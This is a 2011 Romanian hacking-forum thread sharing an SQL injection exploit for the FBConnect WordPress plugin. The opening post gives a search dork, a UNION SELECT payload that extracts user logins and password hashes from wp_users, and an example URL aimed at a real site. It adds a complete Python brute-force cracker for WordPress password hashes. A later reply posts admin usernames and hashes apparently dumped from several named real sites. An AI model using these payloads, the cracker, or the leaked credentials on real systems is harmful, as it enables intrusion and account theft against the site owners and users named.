x3uz Posted May 8, 2011 Report Posted May 8, 2011 (edited) Wordpress Sql InjectionApp : FBConnect WordPress PluginType : Sql-InjectionDork : inurl:"fbconnect_action=myhome" Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--Exemple:http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python):# code by : tdxev# website : www.tdxev.com# team : www.insecurity.ro# version : 2011.01.17# documentation : /wp-includes/class-phpass.phpimport md5import time# user settingswpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxevcharSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will usedumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hashprogFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made# app settingsitoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'# use by crypt_privatedef encode64 (textInput,count): output = '' i = 0 while i < count : i = i + 1 value = ord(textInput[i-1]) output = output + itoa64[value & 63] if i < count : value = value | ord(textInput[i]) << 8 output = output + itoa64[(value >> 6) & 63] i = i + 1 if i >= count: break if i < count: value = value | ord(textInput[i]) <<16 output = output + itoa64[(value >> 12) & 63] i = i + 1 if i >= count: break output = output + itoa64[(value >> 18) & 63] return output# generate wordpress hashdef crypt_private (plainText, wordpressHash): output = '*0' # old type | not suported yet if wordpressHash[0:2] == output: output = '*1' if wordpressHash[0:3] != '$P$': # old type | not suported yet return output count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash if (count_log2 < 7) or (count_log2>30): return output count = 1 << count_log2 # get who many times will generate the hash salt = wordpressHash[4:12] # get salt from the wordpress hash if len(salt) != 8 : return output plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try for i in range (count): plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt) output = output + encode64(plainTextHash,16) # create the new hash return output# class that generate the wordsclass wordGenerator (): def __init__(self, word, charSet): self.setCurretWord(word) # word to start self.setCharSet(charSet) # characther set used to generate the words # set current word def setCurretWord (self, word): self.currentWord = word # set the character set that will be used def setCharSet (self, charSet): self.charSet = charSet # generate the next word set that word as currentWord and retutn the word def nextWord (self): self.setCurretWord( self._incWord(self.currentWord) ) return self.currentWord # generate the next word def _incWord(self, word): word = str(word) # convert to string if word == '': # if word is empty return self.charSet[0] # return first char from the char set wordLastChar = word[len(word)-1] # get the last char wordLeftSide = word[0:len(word)-1] # get word without the last char lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set else: # it is the last char wordLastChar = self.charSet[0] # reset last chat to have first character from the char set wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased return wordLeftSide + wordLastChar # return the next word# check if is right type of hashsfor wpHash in wpHashList: if wpHash[0:3] != '$P$': print "Wrong password type or password type is DES not impemented yet!" exit()# create a new wordGeneratornewWord = wordGenerator ('',charSet); # word generatorwordsFound = 0exitLoop = Falsedef found(hashItem, word): global wordsFound global exitLoop d = open(dumpFile,'a') # open file for append d.write(hashItem + ' = ' + word +"\n") # write the result d.close() # close file wordsFound = wordsFound + 1 # increase the number of hashs cracked print hashItem + ' = ' + word # display the word if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list exitLoop = True # rise flag to stop the loop and exitdef setProgress(word) : d = open(progFile,'w') # open file for append d.write("Position :"+ word +"\n") # write the current word d.close() # close filecount = 0while exitLoop == False: word = newWord.nextWord() count = count + 1 #print word for wpHash in wpHashList: newHash = crypt_private(word,wpHash) if wpHash == newHash : found(newHash,word) if count == 1000 : count = 0 setProgress(word)H4ve fun :D:D Edited May 8, 2011 by x3uz Quote
Paul4games Posted May 8, 2011 Report Posted May 8, 2011 Este public de ceva timp pe exploit-db..... Quote
x3uz Posted May 8, 2011 Author Report Posted May 8, 2011 whit the python script....? I do not think \M/ Quote
Paul4games Posted May 8, 2011 Report Posted May 8, 2011 Nu cu pythone dar puteai folosi sqlmap din cate stiu... Quote
Mr.KyKy Posted May 19, 2011 Report Posted May 19, 2011 x3uz , testat si merge 100% . Bine lucrat poate vei reusi sa gasesti direct pe facebook ceva. Quote
MagicThunder Posted May 19, 2011 Report Posted May 19, 2011 @redcoder inca nu ti-ai dat seama ca acum se posteaza ampulea?Unii posteaza sa se afle in treaba chiar daca sunt total pe dinafara cu totul.Pun pariu ca MR.KYKY habar nu are ce e un dork sau cum se foloseste.Nici daca ii dai scriptul compilat si facut in GUI habar nu are ce sa faca cu el.Nu mai postati fratilor de dragul de a posta pentru ca e egal cu zero.Macar sa aveti de 10 ori mai putine posturi dar cu ceva util si nu porcarii.Toate topicuril cu salut si bine ai venit au mai multe replyuri decat oricare altele.Macar uitati-va in p**a mea la ce posteaza Nytro si invatati ceva.La topicurile lui nu am vazut nici un reply sau foarte rar. Quote
hammerfall Posted May 19, 2011 Report Posted May 19, 2011 (edited) @tunet magic, sincer, mi se pare ok ca nu-s raspunsuri prea multe la topicurile lui nytro. Ar fi absurd sa vezi toti copiii cum comenteaza "asa e, e bun tutorialul" sau "ai dreptate, chiar merge". Plus de asta, nu cred ca majoritatea (copiilor) inteleg engleza cat sa se descurce cu un tutorial... se descurca la metin, la CS, ls tampenii, dar la un tutorial, daca se poate tradus in romana si cu poze cat mai multe. Scuze de off-topic, dar nu m-am putut abtine. Apropo, misto SQLi-ul, n-am apucat inca sa-l testez, dar cred ca-mi fac timp maine. Edited May 19, 2011 by hammerfall SQLi nu XSS... oboseala... :p Quote
MagicThunder Posted May 19, 2011 Report Posted May 19, 2011 Hammerfall ma refeream la reply uri inteligente si chiar testate nu la gen: "asa e, e bun tutorialul" sau "ai dreptate, chiar merge" .Decat asa mai bine lipsa sincer.Despre ce xss vorbesti? Quote
hammerfall Posted May 19, 2011 Report Posted May 19, 2011 Am editat postul... De la oboseala... De parca nu ar fi scris mare in titlu... Quote
Mr.KyKy Posted May 20, 2011 Report Posted May 20, 2011 (edited) redcoder am facut manual !Edit :MagicThunder si daca iti zic ca am habar de drok , de xss , perl , c++ , python , visual basic 2006-2008 etc... . Te rog alta data abtinete si mai ales cu limbajul . Totusi suntem pe un forum unde nu se face offtopic aiurea , ok ?MultumescPentru tine MagicThunder :http://www.361.rouser : admin pass : $P$Bsd11lSuD.d98wyQmwbIaZi5dN4aZf0http://euwarez.orguser : adminpass : $P$BaaVNlm6KQV71aTfTuYlwScosReC/F/ http://constantin.ghioc.ro/bloguser : adminpass : P$B1YRdg96hVhlFxzBDAFNO3Hz3BboMt.http://www.solutionhacker.comuser : poderul pass : $P$BNWmW1qF9idDUgkHLJy0wslqD4SLKp. Edited May 20, 2011 by Mr.KyKy Quote